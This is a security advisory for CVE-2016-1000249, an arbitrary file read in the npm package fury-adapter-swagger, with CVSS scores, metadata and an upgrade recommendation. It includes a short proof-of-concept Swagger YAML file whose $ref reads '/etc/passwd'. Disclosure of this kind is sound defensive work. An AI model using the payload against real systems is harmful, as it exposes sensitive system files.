logo

CVE-2016-1000249 fury-adapter-swagger

Package

Manager: npm
Name: fury-adapter-swagger
Vulnerable Version: >=0.2.0 <0.9.7

Severity

Level: High

CVSS v3.1: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

CVSS v4.0: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N

EPSS: N/A pctlN/A

Details

fury-adapter-swagger allows arbitrary file read from system `fury-adapter-swagger` from version 0.2.0 until version 0.9.7 has a weakness that allows an attacker to read arbitrary files off of the system. This can be used to read sensitive data, or to cause a denial of service condition by attempting to read something like `/dev/zero`. ## Proof of Concept: ```yaml --- swagger: '2.0' info: title: Read local files version: '1.0' paths: /foo: get: responses: 200: description: Some description examples: text/html: example: $ref: '/etc/passwd' ``` ## Recommendation Upgrade to version 0.9.7 or later.

Metadata

Created: 2020-09-01T16:38:33Z
Modified: 2023-09-11T16:45:35Z
Source: https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/09/GHSA-2r7f-4h2c-5x73/GHSA-2r7f-4h2c-5x73.json
CWE IDs: ["CWE-22"]
Alternative ID: GHSA-2r7f-4h2c-5x73
Finding: F063
Auto approve: 1